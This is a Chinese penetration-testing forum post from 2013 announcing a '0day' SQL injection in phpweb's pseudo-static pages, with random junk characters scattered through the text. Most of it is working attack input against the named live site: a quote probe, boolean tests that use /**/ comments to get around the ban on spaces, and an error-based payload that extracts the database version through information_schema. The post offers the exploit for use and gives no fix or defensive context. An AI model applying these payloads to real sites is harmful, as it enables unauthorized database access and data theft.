中国网络渗透测试联盟

标题: phpweb伪静态页面注入0day [打印本页]
作者: admin    时间: 2013-1-4 19:46
标题: phpweb伪静态页面注入0day
phpweb所有的整站程序伪静态页面都存在sql注入
8 M/ d) n* v$ l0 u
5 O3 c) }& V( Y( q; d. V% V' U主站:http://phpweb.net/
! a% ?: `" O1 Z2 C3 k9 w4 s加’检测:
* [8 V3 ~# r! C7 | , j( o+ z( U: H
http://www.phpweb.net/down/html/?772′.html
+ X. n9 p- ]/ C8 O8 o0 |4 s  p' [( e
& |8 M4 X  y( v7 K& h出错; x" M4 }1 F1 G1 O! W" R! T4 S
存在注入。5 D7 h0 ~) {  G. R
不能用空格,只能用/*罗- e& M* F  u( t9 K2 A9 }: \8 k1 y4 h
http://www.phpweb.net/page/html/?56′/**/and/**/1=1/*.html 正常& a8 I7 J( Y; x: \0 W

0 \5 X0 C6 u+ D# P4 Ihttp://www.phpweb.net/page/html/?56′/**/and/**/1=2/*.html 出错.$ q( d  ?2 F- Y% r
爆数据库版本:0 i# q- x0 S, J( ]$ R
3 {, s# n9 ?) B- u
?& V7 R4 V. \7 P# `
1
& K) z- {3 e" O1 K) L1 Ghttp://www.phpweb.net/page/html/?56'/**/and/**/(SELECT/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),(substring((select(version())),1,62)))a/**/from/**/information_schema.tables/**/group/**/by/**/a)b)=1/*.html
2 w# L& Q) X. i7 F# H( O更新日期: 2013-01-03 13:39:50        5 {4 Q  c0 j: O; S" @/ h




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2